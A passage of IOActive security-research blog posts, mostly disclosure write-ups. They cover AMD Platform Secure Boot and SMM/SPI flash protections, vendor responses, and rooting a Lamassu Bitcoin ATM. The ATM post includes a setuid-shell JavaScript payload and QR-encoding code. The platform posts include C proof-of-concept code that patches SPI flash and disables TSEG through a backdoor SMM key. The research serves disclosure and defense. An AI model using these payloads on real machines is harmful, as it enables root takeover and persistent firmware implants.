A slightly later start than yesterday, but it allowed folks like me to catch up a little on email and activity back at home base. Kicking off today was the keynote, which was superbly delivered by Paul Scheidt of Synopsys. Entitled “Perspectives from Four Decades of Chip Design,” Paul provided fascinating insight into his career in the semiconductor industry. He contrasted how much the industry has advanced, alongside several instances where ideas have been recycled from previous generations of chips and systems. Following that, there were three further sessions and some more opportunities for informal discussion (the full agendas are here). The focuses for the talks today included FPGA and netlist reverse engineering.

Of course, for the IOActive folks, the focus and highlight of Day Two was our very own Dr. Andrew Zonenberg, presenting during the afternoon case studies session. “Secure Element vs Cloners: A Case Study” explores an example wherein a platform may be protected for the sake of both revenue and user experience: the OEM wants to protect their accessory market as best they can, and for as long as they can, while competitors are racing to make a compatible version of the accessory in question. These are potentially billion-dollar markets, so the reward is high and invites third parties with serious budgets to perform full netlist extractions of chips in order to carry out Focused Ion Beam (FIB) attacks. A multi-million-dollar lab and the associated talent (the latter often being the most difficult part) does not seem too much of an investment when the return could be tens of millions of dollars per year!

Information on the range of IOActive’s Silicon Security Services can be found here.

Andrew presented flawlessly (no surprises there), and the talk was very well received indeed. Some interesting follow-up conversations ensued, which for me capped off a very worthwhile event.

Andrew in full flow – once he gets started, there is no stopping him!

Conclusions

HARRIS 2024 was an extremely well-run event, which is not surprising considering the success of CHES under Christof Paar. For anyone who is involved in semiconductor reverse engineering, this really is a must-go. The format works very well, provides plenty of opportunities for networking, and the quality of talks was exceptional. I was impressed and am very much looking forward to attending next year, with something even more interesting for IOActive to present. Roll on HARRIS 2025!

INSIGHTS, RESEARCH | February 6, 2024

Exploring AMD Platform Secure Boot

Introduction

In our previous post on platform security (see here) we provided a brief introduction into platform security protections on AMD-based platforms and touched upon the topic of AMD Platform Secure Boot (PSB).

As a quick reminder, the purpose of PSB is to provide a hardware root-of-trust that will verify the integrity of the initial UEFI firmware phases, thereby preventing persistent firmware implants.

In this part of the blog series, we will dig deeper into the nitty-gritty details of PSB, including a first glimpse of how it works under the hood, how it should be configured and, naturally, how various major vendors fail to do so.

Architecture

To begin, it is important to understand that the UEFI boot process is divided into various phases, referred to as SEC, PEI, DXE, BDS, TSL, RT and AL. For the sake of brevity, we won’t go into detail on the purpose of each phase, as it has already been widely covered elsewhere (e.g. here).

In short, the role of the PSB is to ensure that the initial UEFI phases, specifically the SEC and PEI phase, are properly verified and cannot be tampered with. In turn, the PEI phase will verify the DXE phase using a proprietary and vendor-specific method.   

The resulting scheme is summarized in the following image:

Upon reset, only the AMD Platform Security Processor (PSP), an ARM-based co-processor embedded within the AMD chip, is running. It functions as a hardware root-of-trust and verifies the SEC and PEI phase portions of the UEFI firmware. If verification succeeds, then it releases the main cores that then start executing the SEC and PEI phase.

Trust Hierarchy

In order to understand the trust hierarchy in more depth, we will first take a look at how the UEFI firmware, stored in the SPI flash, is structured. To do so, we will use the SPI flash dump we have obtained from an AMD-based Huawei Matebook 16 (BIOS v2.28).

When we open up a SPI flash dump with our trusty UEFI Tool, we will typically see, among others, the following structures:

  • Padding areas
  • Firmware volumes (containing DXE drivers and SMM modules)
  • NVRAM data (containing non-volatile configuration data, i.e. UEFI variables)

However, while UEFI Tool correctly identifies firmware volumes that contain code executed in the DXE phase of the UEFI boot process, the code running in the SEC and PEI phases seems to be missing altogether.

This is because it does not support parsing an AMD platform specific structure called the Embedded Firmware Structure (EFS). Once again, for the sake of brevity, as the structure is relatively complex, we will only focus on portions relevant to the chain-of-trust.

As described here, the EFS is located at one of the pre-defined locations in the SPI flash and contains pointers to:

  1. The PSP directory table that includes:
    • The BIOS signing key (entry type 0x05)
    • The BIOS PEI firmware volume (entry type 0x62)
    • The BIOS PEI firmware volume signature (entry type 0x07)
  2. The BIOS directory table that includes:
    • The AMD root signing key (entry type 0x00)

In visualized form, the resulting data structure looks as follows:

As a sidenote, we have also developed a simple parser (available here) that can be used to parse and extract the different portions of the PSP and BIOS directories.
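For readers who want to poke at a dump themselves, a minimal sketch of the parsing idea follows. It scans for the directory magic rather than relying on the fixed EFS offsets, and the 16-byte entry layout (type, subprogram, reserved, size, location) is based on publicly documented PSP directory formats; treat both as assumptions to verify against your own image.

# Minimal sketch: locate the first PSP directory table in a SPI flash
# dump and list its entries. Entry layout (type u8, subprogram u8,
# reserved u16, size u32, location u64) follows publicly documented
# PSP directory formats and should be treated as an assumption.
import struct, sys

def parse_psp_directory(image, magic=b"$PSP"):
    base = image.find(magic)           # first occurrence only
    if base < 0:
        return []
    # header: magic (u32), checksum (u32), entry count (u32), reserved (u32)
    count = struct.unpack_from("<I", image, base + 8)[0]
    entries = []
    for i in range(count):
        off = base + 16 + 16 * i
        etype, subprog, _rsvd, size, loc = struct.unpack_from("<BBHIQ", image, off)
        entries.append((etype, size, loc))
    return entries

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read()
    for etype, size, loc in parse_psp_directory(data):
        print(f"type=0x{etype:02x} size=0x{size:x} location=0x{loc:x}")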

Upon reset, the PSP will hold the main cores and verify the trust chain in the following order:

  • The AMD root signing key is verified against a SHA256 hash programmed into the PSP
  • The BIOS signing key is verified against the AMD root signing key
  • The BIOS PEI firmware volume is verified against the BIOS signing key

At this point the PSP releases the main cores and the SEC+PEI phase code, stored in the PEI firmware volume, will execute. Then, to complete the chain-of-trust, a vendor-specific PEI module will verify the DXE firmware volume(s).
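Expressed as code, the verification sequence looks roughly like the sketch below. This is purely structural: the actual PSP uses AMD-specific key and signature formats, and the RSA-PSS parameters shown here are our assumptions, not confirmed details.

# Structural sketch of the PSB chain-of-trust (not AMD's actual code).
# Key/signature formats and the RSA-PSS parameters are assumptions.
import hashlib
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding

def verify_chain(fused_root_key_hash, root_key_der, bios_key_der,
                 bios_key_sig, pei_fv, pei_fv_sig):
    # 1. The AMD root signing key must match the SHA256 hash fused into the PSP
    if hashlib.sha256(root_key_der).digest() != fused_root_key_hash:
        raise ValueError("AMD root signing key does not match fused hash")
    root_key = serialization.load_der_public_key(root_key_der)
    pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                      salt_length=padding.PSS.MAX_LENGTH)
    # 2. The BIOS signing key must be signed by the root key (raises on failure)
    root_key.verify(bios_key_sig, bios_key_der, pss, hashes.SHA256())
    # 3. The BIOS PEI firmware volume must be signed by the BIOS key
    bios_key = serialization.load_der_public_key(bios_key_der)
    bios_key.verify(pei_fv_sig, pei_fv, pss, hashes.SHA256())
    # Only now would the PSP release the main cores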

PSB Configuration

The next step is to understand how we can interact with the PSP to determine whether the PSB is properly configured or not. This, in turn, could be used to implement a simple tool to detect potential misconfigurations. 

Here we found that the configuration can be checked by first determining the PSP MMIO base address and then, at a specific offset, reading out the value of two PSB-related registers.

PSP MMIO Base Address

First, the PSP MMIO base address is obtained by writing a specific value to a register of the AMD IOHUB Core (IOHC). More specifically:

  • 0x13E102E0 for families 17h, model 30h/70h or family 19h, model 20h or
  • 0x13B102E0 for all other models

is written to the register at offset 0xB8 of the IOHC device (on bus 00h, device 00h, function 00h) and the result is read from the register at offset 0xBC.

For example, on an Acer Swift 3 (fam 17h, model 60h) we write the value 0x13B102E0 at offset 0xB8 of the IOHC and read the base address 0xFDE00000 (after masking) at offset 0xBC.
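On Linux, the IOHC index/data pair is reachable through the PCI configuration space of device 00:00.0. A minimal sketch follows (requires root; the 0xFFF00000 mask is an assumption based on the example above):

# Minimal sketch: read the PSP MMIO base via the IOHC index/data registers
# at config offsets 0xB8/0xBC of PCI device 00:00.0. Requires root.
# The index value and the 0xFFF00000 mask are assumptions per the text.
import os, struct

INDEX = 0x13B102E0   # families other than 17h/30h,70h and 19h/20h
CFG = "/sys/bus/pci/devices/0000:00:00.0/config"

fd = os.open(CFG, os.O_RDWR)
os.pwrite(fd, struct.pack("<I", INDEX), 0xB8)          # select register
raw = struct.unpack("<I", os.pread(fd, 4, 0xBC))[0]    # read data port
os.close(fd)
print(f"PSP MMIO base: 0x{raw & 0xFFF00000:08X}")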

PSB Configuration Registers

The PSB fuse register, located at offset 0x10994, reflects the actual fuse configuration and has the following structure:

It has various fields, such as:

  • the platform vendor ID and platform model ID to uniquely identify the platform
  • the BIOS key revision and anti-rollback to revoke BIOS signing keys
  • the AMD disable key to prevent booting a BIOS signed with the AMD root signing key
  • the PSB enable field to enable the feature
  • the customer key lock to permanently burn the fuses

We observed that on systems with the PSB enabled, typically the platform vendor ID, the platform model ID, the PSB enable bit and the customer key lock are configured accordingly. In fact, if the BIOS was compiled with the feature enabled, the fusing process occurs automatically when the system boots for the first time.

Interestingly, the PSB can also be permanently disabled by setting the PSB enable bit to 0 and the customer key lock to 1. This would enable an attacker to leave the system vulnerable indefinitely and is similar to what was discovered for Intel BootGuard by Alexander Ermolov (see Safeguarding Rootkits: Intel BootGuard at ZeroNights). 

The PSB status register, located at offset 0x10998, is used for obtaining PSB state information and has the following structure:

Here we only know that the PSB status field returns 0x00 if no errors occurred; otherwise, it returns a non-zero value likely corresponding to a specific error code.
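With the base address in hand, both registers can be read through /dev/mem. Since decoding individual fields depends on the exact bit layouts shown above, the sketch below simply dumps the raw register values; the hard-coded base address is taken from the Acer example and is machine-specific.

# Minimal sketch: dump the PSB fuse and status registers via /dev/mem.
# Requires root and a kernel without STRICT_DEVMEM restrictions.
import mmap, os, struct

PSP_BASE = 0xFDE00000        # from the previous step; machine-specific
FUSE_OFF, STATUS_OFF = 0x10994, 0x10998

fd = os.open("/dev/mem", os.O_RDONLY)
page = PSP_BASE + 0x10000    # page-aligned mapping containing both registers
mem = mmap.mmap(fd, 0x1000, prot=mmap.PROT_READ, offset=page)
fuse = struct.unpack_from("<I", mem, FUSE_OFF & 0xFFF)[0]
status = struct.unpack_from("<I", mem, STATUS_OFF & 0xFFF)[0]
print(f"PSB fuse register:   0x{fuse:08X}")   # 0 -> fuses not burned
print(f"PSB status register: 0x{status:08X}") # status field 0 -> no error
os.close(fd)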

Vulnerabilities

Now that we understand how the PSB should be configured, we would like to walk you through misconfiguration and implementation issues we discovered during our research.

For completeness, the list of systems we tested and whether they were found to be vulnerable or not can be found in a table at the end of this blog.

Configuration flaws

Based on our knowledge of the PSB fuse and status registers, we implemented the logic into our in-house developed platform testing tool Platbox (see here) and discovered that almost none of the tested systems had the feature enabled. 

As can be seen below, the Lenovo IdeaPad 1 Gen7 (BIOS JTCN44WW) did not have the PSB fuse register burned and the PSB status field returned a non-zero value. In fact, the same pattern was observed on all other vulnerable systems.

When trying to determine the root cause, we found that various data structures essential to the correct functioning of the PSB were missing, such as the BIOS signing key and the BIOS PEI firmware volume signature. This may indicate that the feature was simply disabled during the build process of the firmware image.

Implementation flaws

Beyond configuration flaws, we also wanted to find out whether there were any potential implementation issues. While AMD implements the first portion of the chain-of-trust, verifying the SEC and PEI phase, we decided to focus on the vendor-specific portion that verifies the DXE phase.

To begin, we picked the Lenovo Thinkpad P16s Gen1 (BIOS v1.32) as our target, as it was one of the few systems that had the PSB enabled, and inspected the firmware with UEFI Tool. As it turns out, it uses a Phoenix-based BIOS and a well-known data structure, called the Phoenix hash file, to verify the DXE phase:

The Phoenix hash file format is straightforward – it is a list of protected ranges of the SPI flash encoded using triples that consist of base address, size and a hash. These protected ranges should, at least in theory, cover the DXE phase code, stored in DXE firmware volumes, that will be loaded.
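Verifying coverage is mechanical once the triples are parsed: every firmware volume that will be loaded should fall entirely inside some protected range. A sketch of that check, with made-up example numbers (the on-disk triple encoding varies, so parsing is left as an input):

# Sketch: given the (base, size, hash) triples from a Phoenix hash file
# and the (offset, size) of each DXE firmware volume in the SPI image,
# flag any volume not fully covered by a single protected range.
def covered(vol_off, vol_size, ranges):
    end = vol_off + vol_size
    return any(base <= vol_off and end <= base + size
               for base, size, _hash in ranges)

def find_unprotected(volumes, ranges):
    return [(off, size) for off, size in volumes
            if not covered(off, size, ranges)]

# Example with made-up numbers: one volume escapes the protected ranges
ranges = [(0x400000, 0x200000, b"..."), (0x700000, 0x100000, b"...")]
volumes = [(0x400000, 0x180000), (0x620000, 0x50000)]
print(find_unprotected(volumes, ranges))   # -> [(0x620000, 0x50000)]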

However, we found that multiple firmware volumes were used and that one of them (GUID 8FC151AE-C96F-4BC9-8C33-107992C7735B) was not covered by the protected ranges. As a result, code contained within said volume could be tampered with, and it would still be loaded automatically during the boot process.

To make matters worse, we noticed that while the BIOS PEI firmware volume verified by the PSP was located at the beginning of the firmware image in the padding section, the Phoenix hash file was located at the end of it and could thereby itself be tampered with.

To confirm that the issue was indeed exploitable, we replaced the PersistenceConfigDxe DXE driver (GUID 27A95D13-15FB-4A2E-91E2-C784BF0D20D3) with a malicious DXE driver that configures the SMM_KEY MSR and allows us, at runtime, to disable the TSEG protections and thereby trivially escalate privileges to SMM (see previous blog post for more details).

Note that an advisory was published by Lenovo (see here) for this vulnerability (assigned CVE-2023-5078) that details which systems it affected and when different BIOS updates were released.

Vendor response

As part of our responsible disclosure process, we have reached out to various vendors in order to address the issues and get an understanding of the underlying problem. The responses were, to say the least, quite surprising:

Acer

“We appreciated your information about a possible vulnerability in Acer product. After thoroughly investigation, AMD PSB is an Optional Design during develop on consumption product, it’s not a mandatory requirement in Swift 3 SF314-42;

even though AMD PSB status is not enabled by default, platform with Secure Boot and Secure Flash are in position to protect system if malicious code injecting to flash ROM, so we don’t consider this as a vulnerability.”

Lenovo

“Platform Secure Boot was introduced as a standard feature on all consumer Lenovo laptops in 2022, and laptops manufactured prior to this date were not designed with this feature in mind. Enabling it on devices now in the field would be likely to frustrate consumers if any unexpected issues arise.”

Huawei

“The PSB function was not enabled on our early AMD platform product, the PSB-like function (also known as “Intel Boot Guard”) was enabled on our later Intel platform product (such as MateBook 16s 2022).

We confirmed with the BIOS supplier (Wingtech Technology) of the AMD platform product, there is no modification plan for this issue. To avoid confusing users, we kindly ask you not to disclose this issue. […]”

Conclusions

The results of our research demonstrate how vendors systematically failed to either properly configure the platform or correctly implement the chain-of-trust. Although it is clear how this issue needs to be addressed, based on vendor responses, it appears that they are reluctant to do so.

These issues would allow an attacker that has obtained a foothold on the OS, in combination with a SPI flash write primitive (e.g. CVE-2023-28468), to install firmware implants on the system. These, by design, bypass any OS- and Hypervisor-level protections that may be implemented and, if done properly, can also be made resistant to traditional firmware updates.

To determine whether you are vulnerable, we recommend running our in-house developed tool Platbox (see here) and, if you are affected, reaching out to the vendor in the hope that they will address these issues.

Appendix

The following table lists the systems we tested and what we discovered.

INSIGHTS, RESEARCH | January 18, 2024

Owning a Bitcoin ATM

Nowadays, Bitcoin and cryptocurrencies might look less popular than they did just a few years ago. However, it is still quite common to find Bitcoin ATMs in numerous locations. 

IOActive had access to a few of these machines, specifically Lamassu's Douro ATM (https://lamassu.is). This provided us with the opportunity to assess the security of these devices and, more specifically, to attempt to achieve full control over them.

Figure 1. Lamassu Douro Bitcoin ATM

In this post, we'll explain all the steps we followed to identify a series of vulnerabilities (CVE-2024-0175, CVE-2024-0176 and CVE-2024-0177) that allow full control over these ATMs. For this exercise, we assumed the role of an attacker with the same physical access to the device that a regular customer might have.

Don’t Touch Me

After booting up, the screen displays the UI of the kiosk's primary application. However, during boot, for a few seconds the user can interact with the Linux operating system's window manager, as illustrated in Figure 2.

Figure 2. Accessing Applications during boot

During this time, it was possible to pop up a terminal window or run any other installed application as a low-privilege user.

Look at the Camera!

In order to obtain full control over the device, the next step was to perform a privilege escalation. To achieve this, we exploited the software update mechanism by creating a file named ‘/tmp/extract/package/updatescript.js’ with the following payload:

// updatescript.js: executed as root by the update watchdog
cp = require("child_process")
// Copy a shell to /tmp and make it setuid root
cp.exec("cp /bin/sh /tmp/shuid; chmod +sx /tmp/shuid")

Next, we created a file named 'done.txt' in the '/tmp/extract' folder. This would trigger the watchdog process, which runs as root on the reviewed machines, to execute the JavaScript payload.

How did we create these files? That's an interesting question: although we had gained access to the graphical interface and a terminal, there was no keyboard plugged in. While we did have physical access to the devices, and opening them up to plug in a keyboard would have been too easy, the goal was to gain control without invasive physical access, so we explored a different approach.

The ATM supports a feature that enables it to read QR codes, and the binary located at ‘/usr/bin/zbarcam’ could be executed using the touch controls, so we only had to use a custom QR code containing our payload. Once the payload was read, a root shell was popped.
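For reference, turning a payload like the one above into a scannable QR code takes only a few lines. The sketch below uses libqrencode and renders the code as ASCII; this tooling choice is illustrative, not necessarily what we used during the engagement (build with cc qr.c -lqrencode):

#include <stdio.h>
#include <qrencode.h>

int main(void)
{
    // JavaScript payload to be delivered through the QR reader
    const char *payload =
        "cp = require(\"child_process\")\n"
        "cp.exec(\"cp /bin/sh /tmp/shuid; chmod +sx /tmp/shuid\")";

    QRcode *qr = QRcode_encodeString(payload, 0, QR_ECLEVEL_L, QR_MODE_8, 1);
    if (qr == NULL)
        return 1;

    // Print the QR code as ASCII blocks (bit 0 of each byte = module)
    for (int y = 0; y < qr->width; y++) {
        for (int x = 0; x < qr->width; x++)
            fputs((qr->data[y * qr->width + x] & 1) ? "##" : "  ", stdout);
        putchar('\n');
    }
    QRcode_free(qr);
    return 0;
}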

The following video illustrates the paths we followed to exploit the vulnerability.

Once we gained root access, we could reasonably have considered the job done. However, we also looked at the '/etc/shadow' file and were able to crack the root password in less than one minute. The same password was valid on all of the devices.

Disclosure Timeline

IOActive followed responsible disclosure procedures, which included the following:

  • 11th July 2023 – Initial contact to report the vulnerabilities.
  • 9th October 2023 – The vendor confirmed the issues were fixed.
  • 25th October 2023 – The vendor asked us to delay publishing details about the vulnerabilities.
  • 22nd November 2023 – The vendor contacted us and published an advisory mentioning the issues were fixed.
  • 18th January 2024 – CVEs published by the corresponding CNA.

The following security bulletin was released by Lamassu regarding their remediation of the security issues found by IOActive:

https://support.lamassu.is/hc/en-us/articles/20747552619149-Security-update-for-Douros-2023-10-26

INSIGHTS, RESEARCH | June 23, 2023

Back to the Future with Platform Security

Introduction

During our recent talk at HardwearIO (see here, slides here) we described a variety of AMD platform misconfigurations that could lead to critical vulnerabilities, such as:

  • TSEG misconfigurations breaking SMRAM protections
  • SPI controller misconfigurations allowing SPI access from the OS
  • Platform Secure Boot misconfigurations breaking the hardware root-of-trust

Here we provide a brief overview of the essential register settings and explain how our internally developed tool Platbox (see here) can be used to verify and, ultimately, exploit them.

SMM Protections

In a previous blog post about AMD platform security (see here) we explained how forgetting to set a single lock can lead to a complete compromise of System Management Mode (SMM).

To recap, on modern systems SMM lives in a protected memory region called TSEG, and four Model-Specific Registers (MSRs) need to be configured to guarantee these protections:

  • 0xC0010111 (SMM_BASE; base of SMM code)
  • 0xC0010112 (SMMAddr; defines TSEG base address)
  • 0xC0010113 (SMMMask; defines TSEG limit and TSEG enable bit)
  • 0xC0010015[SmmLock] (HWCR; defines lock of the aforementioned MSRs)

In the following we can see a breakdown of the aforementioned registers using Platbox on the Acer Swift 3 (model no. SF314-42; BIOS v1.10):

As marked in the output, the SmmLock bit in the Hardware Configuration Register (HWCR) hasn't been set, and therefore the TSEG region protections can simply be disabled by a privileged OS attacker by clearing the TValid bit in the SMMMask MSR.

Additionally, to ensure that the SMM code lies within the protected TSEG region, one should also confirm that the SMM base address (stored in the SMM_BASE MSR) lies inside TSEG. In most cases the EDK2 framework will ensure that this is the case. It is also interesting to note that SMM_BASE is locked when SmmLock is set, thus preventing relocation attacks.
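Putting this together, verifying the two critical bits takes only a couple of MSR reads. The sketch below assumes Platbox's do_read_msr() helper (used later in this post) and the bit positions documented in [1], namely HWCR[0] = SmmLock and SMMMask[0] = TValid:

#define MSR_HWCR      0xC0010015
#define MSR_SMM_MASK  0xC0010113

// Sketch using Platbox's do_read_msr() helper and types.
void check_smm_lock(void)
{
    UINT64 hwcr = 0, smm_mask = 0;
    do_read_msr(MSR_HWCR, &hwcr);
    do_read_msr(MSR_SMM_MASK, &smm_mask);

    if ((hwcr & 1) == 0)        // HWCR[0] = SmmLock
        printf("[!] SmmLock clear: TSEG protections can be disabled from the OS\n");
    if ((smm_mask & 1) == 0)    // SMMMask[0] = TValid
        printf("[!] TValid clear: TSEG protections are not enabled\n");
}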

One additional register that is relevant to the security of SMM is the SMM key register (stored in the SMM_KEY MSR at 0xC0010119; see p. 630 in [1]). This is a write-only MSR that can be set before SmmLock to create a password-protected mechanism for clearing SmmLock later on.

As mentioned in our presentation, while we haven't found an OEM using this register, we used it as part of an exploit to demonstrate persistence on vulnerable platforms.

SPI Flash Protections

The SPI flash plays an important role in the context of platform security as it is used to store both the UEFI BIOS firmware code and configuration data (e.g. the Secure Boot state).

Architecturally, firmware code should only be modified at boot-time during firmware updates (via signed capsule updates) whereas portions of configuration data can be modified at run-time (in a controlled way via SMM).

To enforce this, the SPI controller-related protections need to be configured accordingly. In the following we will explain the relevant protection mechanisms, both the classic ones and the modern ones that will soon replace them.

Classic Protections

Two classic protection mechanisms exist, referred to as ROM protected ranges and SPI restricted commands, each responsible for preventing different types of accesses (see p445 in [2]).

First, ROM protected ranges apply to direct accesses via memory-mapped IO which, in turn, are automatically translated by the hardware into transactions on the SPI bus.

These ranges are configured via four write-once ROM protect registers (see p440 in [2]):

  • D14F3x050 FCH::ITF::LPC::RomProtect0
  • D14F3x054 FCH::ITF::LPC::RomProtect1
  • D14F3x058 FCH::ITF::LPC::RomProtect2
  • D14F3x05C FCH::ITF::LPC::RomProtect3

As we can see below, each of these registers defines the base address, the size and the access protection (read / write):

At the same time, it is important to enable and lock the ROM protected ranges with the AltSPICS register (see p450 in [2]):

  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectEn0]
  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectEn1]
  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectLock]
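A quick check of these bits could look like the sketch below. The register offset matches SPIx01D above, but the bit positions are assumptions for illustration and should be verified against [2]:

#include <stdint.h>
#include <stdio.h>

#define ALTSPICS_OFFSET   0x1D
#define SPI_PROTECT_EN0   (1u << 0)  // assumed bit position
#define SPI_PROTECT_EN1   (1u << 1)  // assumed bit position
#define SPI_PROTECT_LOCK  (1u << 2)  // assumed bit position

// spi_bar points at the memory-mapped SPI controller registers
void check_altspics(volatile uint8_t *spi_bar)
{
    uint8_t altspics = spi_bar[ALTSPICS_OFFSET];

    if ((altspics & SPI_PROTECT_LOCK) == 0)
        printf("[!] ROM protected ranges are not locked\n");
    if ((altspics & (SPI_PROTECT_EN0 | SPI_PROTECT_EN1)) == 0)
        printf("[!] ROM protected ranges are not enabled\n");
}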

However, although we observed that some systems don't configure these ranges, we were unable to perform writes to the SPI flash using this method, either from the OS or from SMM.

Second, SPI restricted commands apply to indirect accesses via the SPI controller, wherein SPI registers are programmed directly. To this end, two restricted command registers are configured (see pp. 447-448 in [2]):

  • SPIx004 FCH::ITF::SPI::SPIRestrictedCmd
  • SPIx008 FCH::ITF::SPI::SPIRestrictedCmd2

Each of these registers defines up to four SPI opcodes that are blocked. Again, we can see the breakdown below:

In this example we can see that SPI writes are blocked altogether by restricting the Write Enable (WREN) opcode that needs to be sent before every SPI write operation.

In practice, when SMM code needs to perform a SPI write transaction it will temporarily disable the restricted command registers, perform the write operation and then restore the restricted command registers again.
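Sketched in code, that disable-write-restore sequence looks roughly as follows. The offsets correspond to SPIx004/SPIx008 above, while the function names are hypothetical:

#include <stdint.h>

// Temporarily lift the opcode restrictions around a SPI write, as SMM
// code does; spi_bar is the memory-mapped SPI controller base.
static void spi_write_unrestricted(volatile uint8_t *spi_bar,
                                   void (*issue_spi_write)(void))
{
    volatile uint32_t *cmd1 = (volatile uint32_t *)(spi_bar + 0x04);
    volatile uint32_t *cmd2 = (volatile uint32_t *)(spi_bar + 0x08);

    uint32_t saved1 = *cmd1, saved2 = *cmd2;  // save restricted opcodes
    *cmd1 = 0;                                // unblock all opcodes (incl. WREN)
    *cmd2 = 0;

    issue_spi_write();                        // perform the write transaction

    *cmd1 = saved1;                           // restore the restrictions
    *cmd2 = saved2;
}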

If these protections are misconfigured, as we have observed on various systems, a privileged OS attacker can easily exploit the issue. Below is a simple proof of concept that patches a portion of the SPI flash (see here):

void proof_of_concept()
{
    amd_retrieve_chipset_information();

    // Target flash linear address to patch
    UINT32 target_fla = 0x00000000;

    // Read and print SPI flash portion
    BYTE *mem = (BYTE *)calloc(1, 4096);
    read_from_flash_index_mode(NULL, target_fla, 4096, mem);
    print_memory(0xFD00000000 + target_fla, (char *)mem, 0x100);

    // Patch SPI flash
    const char msg[] = "Dude, there is a hole in my BIOS";
    amd_spi_write_buffer(NULL, target_fla, (BYTE *)msg, strlen(msg));

    // Read and print modified SPI flash portion
    read_from_flash_index_mode(NULL, target_fla, 4096, mem);
    print_memory(0xFD00000000 + target_fla, (char *)mem, 0x100);
    free(mem);
}

In short, the code will first print the portion of the flash that is to be patched. It will then patch it, and finally print the modified flash portion again. The amd_spi_write_buffer() API automatically handles reading the affected SPI flash pages, patching them and writing them back.

Modern SPI Protections

On more modern systems we have observed that the aforementioned protection mechanisms are slowly being replaced by a newer technology referred to as ROM Armor.

In essence, ROM Armor is AMD’s equivalent of Intel’s Protected Range Registers (PRRs) and ensures that only whitelisted portions of the SPI flash can be modified at run-time (in a controlled fashion via SMM).

To determine which portions of the SPI flash are whitelisted, we developed a script that parses the PSP directory and extracts the whitelisted regions (see here):

Note that in this case we used an Acer TravelMate P4 (model no. TMP414-41-R854; BIOS v1.08) instead, as this technology is only present in the most recent systems.

Hardware Root-of-Trust Configurations

Platform Secure Boot (PSB) is AMD's implementation of a hardware root-of-trust. It ensures that the initial phases of the UEFI BIOS firmware haven't been tampered with, and it is the main line of defense against persistent firmware implants.

PSB is implemented using an embedded chip called the Platform Security Processor (PSP). In order for PSB to be enforced, the UEFI BIOS firmware needs to be built accordingly and the PSB-related fuses in the PSP need to be configured.

We’ve found that two registers in particular can be leveraged to determine whether PSB has been enabled correctly:

  • PSB Fuse Register (defines fuse configuration)
  • PSB State Register (defines configuration state)

While the PSB fuse register can be used to determine whether PSB has been enabled and the fuses have been locked, the PSB state register indicates the status of the PSB configuration.

Herein we can see a more detailed breakdown of these registers:

As we can see, the Acer Swift 3 does not properly configure the PSB fuses and the PSB status indicates that an error has occurred.

The following video demonstrates how the ability to write to the SPI flash (via an SMI vulnerability or SPI controller misconfigurations), combined with the lack of PSB, results in a persistent firmware implant.

First, we attempt to read the TSEG region and see that it's not accessible, as it returns only FFs. We therefore patch the firmware via a vulnerable SMI handler to embed our backdoor, and reset the system:

Next, we attempt to read the TSEG region again and see that the result is the same. However, this time around, after disabling the TSEG protections via the SMM_KEY configured by our backdoor, we are able to read it out:

Here is the proof-of-concept that leverages the SMM key configured by the backdoor, clears the SmmLock bit in the HWCR register and finally disables TSEG protections (see here):

#define MSR_SMM_KEY     0xC0010119
#define MSR_SMM_KEY_VAL 0x494f414354495645  // ASCII for "IOACTIVE"

int main(int argc, char **argv)
{ 
  open_platbox_device();
  
  // Fetching TSEG base address and size
  UINT64 tseg_base = 0;
  UINT32 tseg_size = 0;
  get_tseg_region(&tseg_base, &tseg_size);
  printf("TSEG Base: %08x\n", tseg_base);
  printf("TSEG  End: %08x\n", tseg_base + tseg_size);

  // Reading start of TSEG region
  printf("\nReading TSEG region:\n");
  void *tseg_map = map_physical_memory(tseg_base, PAGE_SIZE);
  print_memory(tseg_base, (char *) tseg_map, 0x100);
  unmap_physical_memory(tseg_map, PAGE_SIZE);
  
  // Disabling TSEG protections using backdoor
  getchar();
  printf("=> Setting SMM Key\n");
  // Writing the key configured by our backdoor clears SmmLock
  do_write_msr(MSR_SMM_KEY, MSR_SMM_KEY_VAL);

  getchar();
  printf("=> Disabling TSEG protection\n");
  UINT64 tseg_mask = 0;
  do_read_msr(AMD_MSR_SMM_TSEG_MASK, &tseg_mask);
  // Clear TValid/AValid (bits 1:0) to disable the TSEG protections
  do_write_msr(AMD_MSR_SMM_TSEG_MASK, tseg_mask & 0xFFFFFFFFFFFFFFFC);

  // Reading start of TSEG region
  getchar();
  printf("\nReading TSEG region:\n");
  tseg_map = map_physical_memory(tseg_base, PAGE_SIZE);
  print_memory(tseg_base, (char *) tseg_map, 0x100);
  unmap_physical_memory(tseg_map, PAGE_SIZE);
  
  close_platbox_device();

  return 0;
}

SMM Supervisor OEM Policies

The SMM Supervisor is AMD's approach to deprivileging and isolating SMI handlers. When implemented, SMI handlers need to go through an enforcement module to gain access to MSRs and IO registers. Additionally, paging is introduced, which limits their access to arbitrary system memory. Every time an SMI handler attempts to access these privileged resources, an OEM policy is consulted to determine whether access is allowed.

OEM policies live within the Freeform Blob called SmmSupvBin with the GUID {83E1F409-21A3-491D-A415-B163A153776D}. The policy contains multiple types of entries:

  • Memory
  • IO Register
  • MSR
  • Instruction
  • SaveState

A small utility is available in the Platbox repository (see here). It will attempt to parse UEFI images and extract the policy; alternatively, if you provide a previously extracted raw policy, it will print its details.

For example, one section of an OEM policy specifically restricts IO register write access to 0xCF8 and 0xCFC, thereby restricting access to the PCI configuration space. We believe this capability will come in handy for baseline comparisons of OEM policies across various platforms, as it gives researchers the ability to quickly see whether an OEM failed to restrict a specific MSR or IO register that could aid an attacker.

Resources

[1] AMD64 Architecture Programmer’s Manual, Volume 2: System Programming
[2] Processor Programming Reference (PPR) for AMD Family 17h Model 20h, Revision A1 Processors

INSIGHTS, RESEARCH | June 13, 2023

Applying Fault Injection to the Firmware Update Process of a Drone

IOActive recently published a whitepaper covering the current security posture of the drone industry. IOActive has been researching the possibility of using non-invasive techniques, such as electromagnetic (EM) side-channel attacks or EM fault injection (EMFI), to achieve code execution on a commercially available drone with significant security features. For this work, we chose one of the most popular drone models, DJI’s Mavic Pro. DJI is a seasoned manufacturer that emphasizes security in their products with features such as signed and encrypted firmware, Trusted Execution Environment (TEE), and Secure Boot.

Attack Surface

